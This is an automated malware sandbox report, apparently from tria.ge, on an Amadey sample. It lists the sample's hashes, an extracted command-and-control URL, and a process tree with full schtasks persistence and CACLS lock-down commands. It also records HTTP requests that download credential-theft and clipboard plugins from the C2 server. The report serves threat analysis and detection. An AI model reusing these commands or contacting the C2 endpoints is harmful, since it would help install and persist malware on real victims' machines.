Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
133s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11/10/2023, 09:53 UTC
Behavioral task
behavioral1
Sample
15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe
Resource
win7-20230831-en
General
-
Target
15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe
-
Size
240KB
-
MD5
409c5cbf20f61015a81e831f58e487a4
-
SHA1
12487a47f634366cc6208837dbd67473878f544e
-
SHA256
15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e
-
SHA512
4c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90
-
SSDEEP
6144:V7Vj3uVUn27+6qQx41QPF2nnugMeS2SpY:xwYfQx9FOnugMeS2
Malware Config
Extracted
amadey
3.89
http://77.91.68.52/mac/index.php
-
install_dir
fefffe8cea
-
install_file
explonde.exe
-
strings_key
916aae73606d7a9e02a1d3b47c199688
Signatures
-
Executes dropped EXE 4 IoCs
pid Process 2612 explonde.exe 2920 explonde.exe 2712 explonde.exe 620 explonde.exe -
Loads dropped DLL 5 IoCs
pid Process 2316 15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe 2508 rundll32.exe 2508 rundll32.exe 2508 rundll32.exe 2508 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2664 schtasks.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 2316 wrote to memory of 2612 2316 15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe 28 PID 2316 wrote to memory of 2612 2316 15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe 28 PID 2316 wrote to memory of 2612 2316 15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe 28 PID 2316 wrote to memory of 2612 2316 15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe 28 PID 2612 wrote to memory of 2664 2612 explonde.exe 29 PID 2612 wrote to memory of 2664 2612 explonde.exe 29 PID 2612 wrote to memory of 2664 2612 explonde.exe 29 PID 2612 wrote to memory of 2664 2612 explonde.exe 29 PID 2612 wrote to memory of 2948 2612 explonde.exe 31 PID 2612 wrote to memory of 2948 2612 explonde.exe 31 PID 2612 wrote to memory of 2948 2612 explonde.exe 31 PID 2612 wrote to memory of 2948 2612 explonde.exe 31 PID 2948 wrote to memory of 2832 2948 cmd.exe 33 PID 2948 wrote to memory of 2832 2948 cmd.exe 33 PID 2948 wrote to memory of 2832 2948 cmd.exe 33 PID 2948 wrote to memory of 2832 2948 cmd.exe 33 PID 2948 wrote to memory of 2528 2948 cmd.exe 34 PID 2948 wrote to memory of 2528 2948 cmd.exe 34 PID 2948 wrote to memory of 2528 2948 cmd.exe 34 PID 2948 wrote to memory of 2528 2948 cmd.exe 34 PID 2948 wrote to memory of 2996 2948 cmd.exe 35 PID 2948 wrote to memory of 2996 2948 cmd.exe 35 PID 2948 wrote to memory of 2996 2948 cmd.exe 35 PID 2948 wrote to memory of 2996 2948 cmd.exe 35 PID 2948 wrote to memory of 2784 2948 cmd.exe 36 PID 2948 wrote to memory of 2784 2948 cmd.exe 36 PID 2948 wrote to memory of 2784 2948 cmd.exe 36 PID 2948 wrote to memory of 2784 2948 cmd.exe 36 PID 2948 wrote to memory of 2680 2948 cmd.exe 37 PID 2948 wrote to memory of 2680 2948 cmd.exe 37 PID 2948 wrote to memory of 2680 2948 cmd.exe 37 PID 2948 wrote to memory of 2680 2948 cmd.exe 37 PID 2948 wrote to memory of 2688 2948 cmd.exe 38 PID 2948 wrote to memory of 2688 2948 cmd.exe 38 PID 2948 wrote to memory of 2688 2948 cmd.exe 38 PID 2948 wrote to memory of 2688 2948 cmd.exe 38 PID 2592 wrote to memory of 2920 2592 taskeng.exe 43 PID 2592 wrote to memory of 2920 2592 taskeng.exe 43 PID 2592 wrote to memory of 2920 2592 taskeng.exe 43 PID 2592 wrote to memory of 2920 2592 taskeng.exe 43 PID 2612 wrote to memory of 2508 2612 explonde.exe 44 PID 2612 wrote to memory of 2508 2612 explonde.exe 44 PID 2612 wrote to memory of 2508 2612 explonde.exe 44 PID 2612 wrote to memory of 2508 2612 explonde.exe 44 PID 2612 wrote to memory of 2508 2612 explonde.exe 44 PID 2612 wrote to memory of 2508 2612 explonde.exe 44 PID 2612 wrote to memory of 2508 2612 explonde.exe 44 PID 2592 wrote to memory of 2712 2592 taskeng.exe 45 PID 2592 wrote to memory of 2712 2592 taskeng.exe 45 PID 2592 wrote to memory of 2712 2592 taskeng.exe 45 PID 2592 wrote to memory of 2712 2592 taskeng.exe 45 PID 2592 wrote to memory of 620 2592 taskeng.exe 46 PID 2592 wrote to memory of 620 2592 taskeng.exe 46 PID 2592 wrote to memory of 620 2592 taskeng.exe 46 PID 2592 wrote to memory of 620 2592 taskeng.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe"C:\Users\Admin\AppData\Local\Temp\15800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explonde.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe" /F3⤵
- Creates scheduled task(s)
PID:2664
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explonde.exe" /P "Admin:N"&&CACLS "explonde.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit3⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:2832
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explonde.exe" /P "Admin:N"4⤵PID:2528
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explonde.exe" /P "Admin:R" /E4⤵PID:2996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:2784
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"4⤵PID:2680
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E4⤵PID:2688
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main3⤵
- Loads dropped DLL
PID:2508
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {26CD5782-EEB0-420A-A9D0-65D9FA9B28AD} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe2⤵
- Executes dropped EXE
PID:2920
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe2⤵
- Executes dropped EXE
PID:2712
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explonde.exe2⤵
- Executes dropped EXE
PID:620
-
Network
-
Remote address:77.91.68.52:80RequestPOST /mac/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.52
Content-Length: 88
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
-
Remote address:77.91.68.52:80RequestGET /mac/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.52
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
-
Remote address:77.91.68.52:80RequestGET /mac/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.52
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:47:01 GMT
ETag: "16400-6069142dbc6a0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
-
509 B 365 B 6 5
HTTP Request
POST http://77.91.68.52/mac/index.phpHTTP Response
200 -
3.6kB 94.8kB 69 75
HTTP Request
GET http://77.91.68.52/mac/Plugins/cred64.dllHTTP Response
404HTTP Request
GET http://77.91.68.52/mac/Plugins/clip64.dllHTTP Response
200
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
240KB
MD5409c5cbf20f61015a81e831f58e487a4
SHA112487a47f634366cc6208837dbd67473878f544e
SHA25615800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e
SHA5124c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90
-
Filesize
240KB
MD5409c5cbf20f61015a81e831f58e487a4
SHA112487a47f634366cc6208837dbd67473878f544e
SHA25615800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e
SHA5124c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90
-
Filesize
240KB
MD5409c5cbf20f61015a81e831f58e487a4
SHA112487a47f634366cc6208837dbd67473878f544e
SHA25615800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e
SHA5124c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90
-
Filesize
240KB
MD5409c5cbf20f61015a81e831f58e487a4
SHA112487a47f634366cc6208837dbd67473878f544e
SHA25615800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e
SHA5124c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90
-
Filesize
240KB
MD5409c5cbf20f61015a81e831f58e487a4
SHA112487a47f634366cc6208837dbd67473878f544e
SHA25615800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e
SHA5124c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90
-
Filesize
240KB
MD5409c5cbf20f61015a81e831f58e487a4
SHA112487a47f634366cc6208837dbd67473878f544e
SHA25615800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e
SHA5124c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90
-
Filesize
89KB
MD52ac6d3fcf6913b1a1ac100407e97fccb
SHA1809f7d4ed348951b79745074487956255d1d0a9a
SHA25630f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe
SHA51279ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6
-
Filesize
89KB
MD52ac6d3fcf6913b1a1ac100407e97fccb
SHA1809f7d4ed348951b79745074487956255d1d0a9a
SHA25630f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe
SHA51279ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6
-
Filesize
273B
MD50c459e65bcc6d38574f0c0d63a87088a
SHA141e53d5f2b3e7ca859b842a1c7b677e0847e6d65
SHA256871c61d5f7051d6ddcf787e92e92d9c7e36747e64ea17b8cffccac549196abc4
SHA512be1ca1fa525dfea57bc14ba41d25fb904c8e4c1d5cb4a5981d3173143620fb8e08277c0dfc2287b792e365871cc6805034377060a84cfef81969cd3d3ba8f90d
-
Filesize
240KB
MD5409c5cbf20f61015a81e831f58e487a4
SHA112487a47f634366cc6208837dbd67473878f544e
SHA25615800eefdfd1a8fece335d8a9ef4732188ba147f237d1159c23293a8e5a6ab4e
SHA5124c28929e1febcf7f0a92c999a80f6c44241f7420b714feca8dc94796a28c2859d68a5a610bc96e42931d8b6d5c723ff6a0b66a00eff6ec0897d010d5df87cc90
-
Filesize
89KB
MD52ac6d3fcf6913b1a1ac100407e97fccb
SHA1809f7d4ed348951b79745074487956255d1d0a9a
SHA25630f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe
SHA51279ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6
-
Filesize
89KB
MD52ac6d3fcf6913b1a1ac100407e97fccb
SHA1809f7d4ed348951b79745074487956255d1d0a9a
SHA25630f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe
SHA51279ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6
-
Filesize
89KB
MD52ac6d3fcf6913b1a1ac100407e97fccb
SHA1809f7d4ed348951b79745074487956255d1d0a9a
SHA25630f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe
SHA51279ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6
-
Filesize
89KB
MD52ac6d3fcf6913b1a1ac100407e97fccb
SHA1809f7d4ed348951b79745074487956255d1d0a9a
SHA25630f0f0631054f194553a9b8700f2db747cb167490201a43c0767644d77870dbe
SHA51279ebf87dccce1a0b7f892473dfb1c0bff5908840e80bbda44235a7a568993a76b661b81db6597798ec6e978dc441dd7108583367ffdc57224e40d0bd0efe93b6